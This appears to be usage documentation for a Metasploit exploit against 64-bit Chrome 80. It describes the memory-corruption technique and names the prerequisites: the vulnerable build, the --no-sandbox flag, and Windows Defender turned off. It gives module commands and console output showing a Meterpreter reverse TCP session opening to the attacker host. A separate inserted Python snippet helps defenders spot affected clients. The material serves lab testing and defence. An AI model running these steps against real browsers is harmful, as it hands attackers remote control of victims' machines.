This module exploits an issue in Google Chrome 80.0.3987.87 (64-bit). The exploit corrupts the length of a float array (`float_rel`), which is then used for out-of-bounds reads and writes on adjacent memory. That relative read/write primitive is used to modify a UInt64Array (`uint64_aarw`), which provides reads from and writes to arbitrary absolute memory addresses. The exploit then uses WebAssembly to allocate a region of RWX memory, whose contents are replaced with the payload shellcode.
The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.
## Vulnerable Application
The module is compatible with any 64-bit Google Chrome (version 80) on any platform (macOS, Linux or Windows); however, the code that writes the shellcode into the RWX region (`wasm_rwx_addr`) may need to be modified for different versions.
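As an added defensive check (not part of the module or its documentation), the following Python snippet triages web-proxy or web-server log lines by User-Agent for Chrome builds in the affected set described above (64-bit, major version 80, with 80.0.3987.87 as the tested build) and separately flags Chrome command lines carrying `--no-sandbox`, which the payload depends on. The log format, the sample lines, and the rule that non-Windows Chrome 80 builds are 64-bit are assumptions of this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Affected set as the page states it: 64-bit Chrome, any version-80 build,
# with 80.0.3987.87 being the build the module was written against.
AFFECTED_MAJOR = 80
TESTED_BUILD = "80.0.3987.87"

# Assumed log format: "combined"-style lines where the User-Agent is the last quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<ua>[^"]*)"\s*$')
CHROME_RE = re.compile(r"Chrome/(\d+)\.(\d+)\.(\d+)\.(\d+)")


def chrome_version(user_agent: str) -> Optional[Tuple[int, int, int, int]]:
    """Return the four-part Chrome build from a User-Agent, or None if it is not Chrome."""
    m = CHROME_RE.search(user_agent)
    if m is None:
        return None
    major, minor, build, patch = (int(x) for x in m.groups())
    return (major, minor, build, patch)


def is_64bit_build(user_agent: str) -> bool:
    """64-bit Chrome on Windows reports "Win64; x64"; the 32-bit build on a 64-bit OS
    reports "WOW64" instead. Assumption of this example: non-Windows Chrome 80 is 64-bit."""
    if "Windows NT" in user_agent:
        return "Win64; x64" in user_agent and "WOW64" not in user_agent
    return True


def classify_ua(user_agent: str) -> Dict[str, object]:
    """Describe one User-Agent: is it Chrome, which build, and is it in the affected set."""
    build = chrome_version(user_agent)
    if build is None:
        return {"chrome": False, "version": None, "affected": False, "tested_build": False}
    version = ".".join(str(part) for part in build)
    return {
        "chrome": True,
        "version": version,
        "affected": build[0] == AFFECTED_MAJOR and is_64bit_build(user_agent),
        "tested_build": version == TESTED_BUILD,
    }


def flag_clients(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, chrome_version) for each request made by an affected build."""
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a line in the assumed log format
        info = classify_ua(m.group("ua"))
        if info["affected"]:
            hits.append((m.group("ip"), str(info["version"])))
    return hits


def is_no_sandbox(cmdline: str) -> bool:
    """True when a Chrome command line carries the --no-sandbox switch the payload depends on."""
    return "--no-sandbox" in cmdline.split()


# The User-Agent shown in the page's console output.
PAGE_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36")

# Constructed sample log lines: one affected client, one 32-bit (WOW64) Chrome 80,
# one Chrome 81 on Linux, and one Firefox client.
SAMPLE_LOG = [
    f'192.168.56.3 - - [04/Mar/2020:21:22:30 +0800] "GET / HTTP/1.1" 200 3133 "-" "{PAGE_UA}"',
    '192.168.56.4 - - [04/Mar/2020:21:23:01 +0800] "GET / HTTP/1.1" 200 3133 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/80.0.3987.87 Safari/537.36"',
    '192.168.56.5 - - [04/Mar/2020:21:23:40 +0800] "GET / HTTP/1.1" 200 3133 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/81.0.4044.92 Safari/537.36"',
    '192.168.56.6 - - [04/Mar/2020:21:24:12 +0800] "GET / HTTP/1.1" 200 3133 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"',
]

if __name__ == "__main__":
    for ip, version in flag_clients(SAMPLE_LOG):
        print(f"{ip}: Chrome {version} is in the affected set")
    cmd = r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox'
    print("sandbox disabled:", is_no_sandbox(cmd))
```

User-Agent strings are client-controlled, so this is a triage aid for finding endpoints that need patching, not proof of version; the command-line check is the more reliable signal that the prerequisite for the payload is present on a host, and would normally be fed from process inventory rather than the constructed string above.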
### Vulnerable Application Installation Steps
You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/
You should ensure that the application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.
## Verification Steps
- Do: `use exploit/multi/browser/chrome_jscreate_sideeffect`
- Do: `set payload windows/x64/meterpreter/reverse_tcp`
- Do: `set LHOST [IP]`
- Do: `set SRVHOST [IP]`
- Do: `set URIPATH / [PATH]`
- Do: `run`
## Scenarios
### Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
Start Google Chrome without a sandbox:

```
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox
```
```
msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] 192.168.56.3 chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
meterpreter >
```